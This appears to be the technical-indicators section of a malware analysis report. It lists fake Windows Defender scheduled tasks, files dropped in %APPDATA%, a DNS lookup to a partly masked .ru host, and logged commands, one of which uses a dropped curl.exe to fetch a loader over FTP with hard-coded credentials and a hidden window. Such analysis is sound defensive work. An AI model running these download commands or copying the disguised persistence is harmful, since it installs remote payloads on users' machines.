Technical Information
- %WINDIR%\tasks\windows defender daily update.job
- %WINDIR%\tasks\windows defender daily checking.job
- %APPDATA%\kernel.dll
- %APPDATA%\asf.exe
- %APPDATA%\autorun.exe
- %APPDATA%\curl.exe
- %TEMP%\dup2.tmp
- DNS ASK su####tmachine.ru
- ClassName: 'EDIT' WindowName: ''
- '%APPDATA%\kernel.dll' -s -p951753
- '%APPDATA%\autorun.exe'
- '%APPDATA%\asf.exe'
- '%APPDATA%\curl.exe' ftp://su####tmachine.ru/launcher_DOWNLOAD.exe --user ivanbonv_83ergsufx:qwerty12345 --output "%APPDATA%\loader.exe"
- '%APPDATA%\curl.exe' ftp://su####tmachine.ru/launcher_DOWNLOAD.exe --user ivanbonv_83ergsufx:qwerty12345 --output "%APPDATA%\loader.exe"' (with hidden window)